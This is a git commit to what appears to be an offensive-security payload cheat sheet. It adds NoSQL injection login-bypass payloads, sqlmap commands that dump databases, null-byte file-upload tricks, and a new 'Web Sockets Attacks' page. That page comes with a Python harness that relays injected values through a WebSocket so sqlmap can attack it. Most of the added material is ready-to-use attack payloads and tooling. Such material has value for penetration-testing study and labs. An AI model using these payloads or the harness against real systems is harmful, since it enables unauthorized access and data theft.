Web socket + title capitalization

2024-12-12 14:22:47 +00:00 · 2019-03-07 00:03:25 +01:00 · 2019-03-07 00:03:25 +01:00 · ee334f981e
commit ee334f981e
parent ef65f36902
8 changed files with 118 additions and 4 deletions
--- a/injection/README.md
+++ b/injection/README.md
@ -11,9 +11,10 @@ in URL
 username[$ne]=toto&password[$ne]=toto

 in JSON
-{"username": {"$ne": null}, "password": {"$ne": null} }
-{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
-{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
+{"username": {"$ne": null}, "password": {"$ne": null}}
+{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
+{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
+{"username": {"$gt":""}, "password": {"$gt":""}}
 ```

 Extract length information
@ -40,6 +41,13 @@ in JSON
 {"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
 ```

+Extract data with "in"
+
+````json
+{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
+```
+
+
 ## Blind NoSQL

 ```python
--- a/injection/README.md
+++ b/injection/README.md
@ -117,6 +117,12 @@ transformed into U+0027 APOSTROPHE (')
 sqlmap --url="<url>" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
 ```

+### Load a request file and use mobile user-agent
+
+```powershell
+sqlmap -r sqli.req --safe-url=http://10.10.10.10/ --mobile --safe-freq=1
+```
+
 ### Custom injection in UserAgent/Header/Referer/Cookie

 ```powershell
--- a/files/README.md
+++ b/files/README.md
@ -31,7 +31,7 @@ Double extensions

 ### Upload tricks

- Null byte (eg: shell.php%00.gif, shell.php%00.png)
+- Null byte (eg: shell.php%00.gif, shell.php%00.png), works well against `pathinfo()`
 - Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`

 ### Picture upload with LFI
--- a/Sockets/Files/ws-harness.py
+++ b/Sockets/Files/ws-harness.py
@ -0,0 +1,63 @@
+#!/usr/bin/python
+import socket,ssl
+from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
+from websocket import create_connection, WebSocket
+from urlparse import parse_qs
+import argparse
+import os
+
+LOOP_BACK_PORT_NUMBER = 8000
+
+def FuzzWebSocket(fuzz_value):
+    print fuzz_value
+    ws.send(ws_message.replace("[FUZZ]", str(fuzz_value[0])))
+    result =  ws.recv()
+    return result
+
+def LoadMessage(file):
+    file_contents = ""
+    try:
+        if os.path.isfile(file):
+            f = open(file,'r')
+            file_contents = f.read()
+            f.close()
+    except:
+        print ("Error reading file: %s" % file)
+        exit()
+    return file_contents
+
+class myWebServer(BaseHTTPRequestHandler):
+    
+    #Handler for the GET requests
+    def do_GET(self):
+        qs = parse_qs(self.path[2:])
+        fuzz_value = qs['fuzz']
+        result = FuzzWebSocket(fuzz_value)
+        self.send_response(200)
+        self.send_header('Content-type','text/html')
+        self.end_headers()
+        self.wfile.write(result)
+        return
+
+parser = argparse.ArgumentParser(description='Web Socket Harness: Use traditional tools to assess web sockets')
+parser.add_argument('-u','--url', help='The remote WebSocket URL to target.',required=True)
+parser.add_argument('-m','--message', help='A file that contains the WebSocket message template to send. Please place [FUZZ] where injection is desired.',required=True)
+args = parser.parse_args()
+
+ws_message = LoadMessage(args.message)
+
+ws = create_connection(args.url,sslopt={"cert_reqs": ssl.CERT_NONE},header={},http_proxy_host="", http_proxy_port=8080)
+
+try:
+    #Create a web server and define the handler to manage the
+    #incoming request
+    server = HTTPServer(('', LOOP_BACK_PORT_NUMBER), myWebServer)
+    print 'Started httpserver on port ' , LOOP_BACK_PORT_NUMBER
+    
+    #Wait forever for incoming http requests
+    server.serve_forever()
+
+except KeyboardInterrupt:
+    print '^C received, shutting down the web server'
+    server.socket.close()
+    ws.close()
--- a/Sockets/Images/WebsocketHarness.jpg
+++ b/Sockets/Images/WebsocketHarness.jpg
--- a/Sockets/Images/sqlmap.png
+++ b/Sockets/Images/sqlmap.png
--- a/Sockets/Images/websocket-harness-start.png
+++ b/Sockets/Images/websocket-harness-start.png
--- a/Sockets/README.md
+++ b/Sockets/README.md
@ -0,0 +1,37 @@
+# Web Sockets Attacks
+
+> The WebSocket protocol allows a bidirectional and full-duplex communication between a client and a server
+
+Tools:
+
+- [ws-harness.py](https://gist.githubusercontent.com/mfowl/ae5bc17f986d4fcc2023738127b06138/raw/e8e82467ade45998d46cef355fd9b57182c3e269/ws.harness.py)
+
+## Summary
+
+* [Using ws-harness.py](#using-ws-harness-py)
+
+## Using ws-harness.py
+
+Start ws-harness to listen on a web-socket, and specify a message template to send to the endpoint.
+
+```powershell
+python ws-harness.py -u "ws://dvws.local:8080/authenticate-user" -m ./message.txt
+```
+
+The content of the message should contains the **[FUZZ]** keyword.
+
+```json
+{"auth_user":"dGVzda==", "auth_pass":"[FUZZ]"}
+```
+
+Then you can use any tools against the newly created web service, working as a proxy and tampering on the fly the content of message sent thru the websocket.
+
+```python
+sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump
+```
+
+
+## References
+
+- [HACKING WEB SOCKETS: ALL WEB PENTEST TOOLS WELCOMED by Michael Fowl | Mar 5, 2019](https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/)
+- [Hacking with WebSockets - Qualys - Mike Shema, Sergey Shekyan, Vaagn Toukharian](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf)